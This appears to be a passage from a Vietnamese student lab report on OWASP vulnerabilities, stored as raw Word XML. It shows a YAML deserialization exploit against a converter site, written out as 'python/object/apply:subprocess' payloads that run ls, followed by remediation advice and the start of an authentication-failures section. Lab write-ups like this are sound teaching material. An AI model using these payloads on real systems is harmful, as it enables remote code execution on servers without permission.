        <w:t>Ứng dụng web có chức năng chuyển đổi từ định dạng YAML sang JSON. Tuy nhiên, ứng dụng này mắc lỗi về tính bảo mật khi cho phép truyền một tệp YAML chứa mã thực thi. Điều này tạo ra nguy cơ cho việc thực hiện các cuộc tấn công kiểu "Code Execution" thông qua các lỗ hổng trong mã thực thi YAML, có thể dẫn đến các hậu quả nghiêm trọng như kiểm soát máy chủ hoặc lợi dụng thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C4B05" w14:textId="77777777" w:rsidR="002F50C5" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F99810" w14:textId="41506A5B" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00FB5E78" w:rsidP="00C64320">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:t>ruy cập vào task và nhận thấy rằng</w:t>
      </w:r>
      <w:r w:rsidR="00C64320">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B4FDE" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB43613" wp14:editId="358B5E28">
            <wp:extent cx="6115050" cy="2757805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="46489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9711" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2757805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B43B804" w14:textId="5D657F55" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">Trang web cho phép chuyển đổi tập tin </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> thành định dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7260E" w14:textId="1F5F066F" w:rsidR="00931C64" w:rsidRDefault="00FB5E78" w:rsidP="00931C64">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C64320">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t>iến hành thực hiện khai thác bằng</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:t xml:space="preserve"> cách</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t xml:space="preserve"> gửi một file yaml lên mà có thể thực hiện chạy code. Đây là file </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>sample.yaml</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t xml:space="preserve"> được đính kèm trong bài lab</w:t>
      </w:r>
      <w:r w:rsidR="00C64320">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177BAE32" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00107B56" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r w:rsidRPr="00107B56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA7E3B2" wp14:editId="49D70239">
            <wp:extent cx="6115050" cy="2785110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1597022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22086" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2785110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED67619" w14:textId="324400CB" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r>
        <w:t xml:space="preserve">Kết quả </w:t>
      </w:r>
      <w:r w:rsidR="00B528F8">
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">đã khai thác thành công. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D974B" w14:textId="166933E2" w:rsidR="00931C64" w:rsidRPr="00107B56" w:rsidRDefault="00FB5E78" w:rsidP="00931C64">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t xml:space="preserve"> Bây giờ, tiến hành thực hiện khai thác bằng cách gửi một file yaml lên mà có thể thực hiện chạy code. Với file yaml có code chạy</w:t>
      </w:r>
      <w:r w:rsidR="00C64320">
        <w:t>, chúng</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t xml:space="preserve"> ta tạo như sa</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:t>u (theo yêu cầu)</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00107B56">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121D59C" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>!!python/object/apply:subprocess.Popen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0CB8CE" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051AAFB3" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:r w:rsidRPr="00107B56">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587D2763" wp14:editId="545CE345">
            <wp:extent cx="6115050" cy="607695"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1691766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66058" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="607695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD318FA" w14:textId="3DC892A9" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00C64320" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:t>hực hiện upload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C721C71" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A87B3E6" wp14:editId="130D2C44">
            <wp:extent cx="6115050" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="985394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94873" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2847975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9EAFF" w14:textId="6D0D586D" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00C64320" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:t>ực hiện điều chỉnh file yaml như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57793192" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>!!python/object/apply:subprocess.check_output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F8E52" w14:textId="77777777" w:rsidR="00931C64" w:rsidRPr="00C64320" w:rsidRDefault="00931C64" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>- ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B3C949" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00535D83">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B67D888" wp14:editId="59EAE393">
            <wp:extent cx="6115050" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1033988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88345" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3DEC21" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>Và thực hiện upload lại:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B989C6E" w14:textId="77777777" w:rsidR="00931C64" w:rsidRDefault="00931C64" w:rsidP="00931C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B84F7A">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23295625" wp14:editId="03DA97D2">
            <wp:extent cx="6115050" cy="2744470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="499017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17295" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2744470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B61E46" w14:textId="2937F2EF" w:rsidR="00931C64" w:rsidRPr="00B84F7A" w:rsidRDefault="00B528F8" w:rsidP="00931C64">
      <w:r w:rsidRPr="00B528F8">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B528F8">
        <w:t>ết quả</w:t>
      </w:r>
      <w:r w:rsidRPr="00B528F8">
        <w:t xml:space="preserve"> cho thấy đã</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B528F8">
        <w:t xml:space="preserve"> khai thác thành công khi kết quả trả về là lệnh</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B84F7A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B528F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B84F7A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72901BC9" w14:textId="550F9930" w:rsidR="002F50C5" w:rsidRPr="00B528F8" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B528F8" w:rsidRPr="008F6347">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B528F8">
        <w:t>kẻ tấn công có thể khai thác các lỗ hổng này để thực hiện các cuộc tấn công từ xa, kiểm soát hệ thống, đánh cắp dữ liệu hoặc gây ra các hậu quả khác tùy thuộc vào tính nghiêm trọng của lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449822A" w14:textId="7DFC8B4A" w:rsidR="002F50C5" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B528F8">
        <w:t>Cần thực hiện việc lọc và kiểm tra đầu vào của các tệp truyền vào, đồng thời chặn các thao tác thực thi trên các tệp này. Điều này sẽ giúp ngăn chặn việc sử dụng các tệp có chứa mã thực thi, giảm thiểu nguy cơ từ lỗ hổng liên quan đến việc sử dụng các thành phần cũ và lỗi thời. Hơn n</w:t>
      </w:r>
      <w:r w:rsidR="00B528F8" w:rsidRPr="00B528F8">
        <w:t>ữ</w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00B528F8">
        <w:t>a, nên dùng các phiên bản mới hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFA102" w14:textId="77777777" w:rsidR="00B528F8" w:rsidRDefault="00B528F8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA4091" w14:textId="260BAC59" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc182909856"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A07:2021 – Identification and Authentication Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="03FC519B" w14:textId="06344B07" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc182909857"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="6AC61FCB" w14:textId="221CDBFC" w:rsidR="00151DDF" w:rsidRPr="00B528F8" w:rsidRDefault="00B528F8" w:rsidP="00B528F8">
      <w:r w:rsidRPr="00B528F8">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t>Lỗi nhận dạng và xác thực có thể xảy ra khi các chức năng liên quan đến danh tính, xác thực hoặc quản lý phiên của ng</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t>ời dùng không đ</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t xml:space="preserve">ợc triển khai </w:t>
      </w:r>
      <w:r w:rsidRPr="00B528F8">
        <w:t xml:space="preserve">đúng </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t>cách hoặc không đ</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t>ợc bảo vệ đầy đủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C09ACB" w14:textId="7136A8CC" w:rsidR="002A3AFF" w:rsidRPr="00B528F8" w:rsidRDefault="00B528F8" w:rsidP="00B528F8">
      <w:r w:rsidRPr="00B528F8">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t>Kẻ tấn công có thể khai thác các lỗi nhận dạng và xác thực bằng cách xâm phạm mật khẩu, khoá, mã thông báo phiên hoặc khai thác các lỗi triển khai khác để giả định danh tính của ng</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00B528F8">
        <w:t>ời dùng khác, tạm thời hoặc vĩnh viễn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23014C4F" w14:textId="1843B95E" w:rsidR="00BD0662" w:rsidRDefault="00BD0662" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc182909858"/>
      <w:r>
        <w:t>Biện pháp ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="614D46F8" w14:textId="4264D0D7" w:rsidR="00E868E7" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng xác thực đa yếu tố (MFA) nếu có thể</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">, để ngăn chặn các cuộc tấn công tự động như credential stuffing, brute force và tái sử dụng thông tin xác thực bị đánh cắp. </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Yêu cầu người dùng nhập mã xác thực gửi đến điện thoại mỗi khi đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85B1AE" w14:textId="6024D2C1" w:rsidR="00E868E7" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Không triển khai với thông tin đăng nhập mặc định</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">, đặc biệt là cho tài khoản quản trị viên. Ví dụ: Đảm bảo rằng việc thay đổi mật khẩu mặc định </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>admin/admin</w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> thành mật khẩu phức tạp hơn khi thiết lập hệ thống lần đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4EE31" w14:textId="63A1034C" w:rsidR="00E868E7" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Kiểm tra mật khẩu yếu</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve">, như kiểm tra mật khẩu mới hoặc thay đổi đối chiếu với danh sách 10,000 mật khẩu tệ nhất. </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Không cho phép người dùng sử dụng các mật khẩu dễ đoán như </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BE08B" w14:textId="4ED39121" w:rsidR="00E868E7" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Đảm bảo chính sách về độ dài, phức tạp và vòng đời của mật khẩu</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> phù hợp với các hướng dẫn hiện đại như NIST 800-63 B. </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> Yêu cầu mật khẩu dài ít nhất 12 ký tự, bao gồm chữ hoa, chữ thường, số và ký tự đặc biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AF2855" w14:textId="54571528" w:rsidR="00E868E7" w:rsidRPr="00620A59" w:rsidRDefault="00E868E7" w:rsidP="00620A59">
      <w:r w:rsidRPr="00620A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Củng cố các quy trình đăng ký, khôi phục thông tin đăng nhập và API</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t xml:space="preserve"> để chống lại các cuộc tấn công xác định tài khoản bằng cách sử dụng cùng một thông báo cho mọi kết quả. Ví dụ: Sử dụng thông báo lỗi chung chung như </w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>Tên người dùng hoặc mật khẩu không chính xác</w:t>
      </w:r>
      <w:r w:rsidR="00620A59" w:rsidRPr="00620A59">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00620A59">
        <w:t>thay vì chỉ ra cụ thể điều gì sai.</w:t>
      </w:r>
    </w:p>
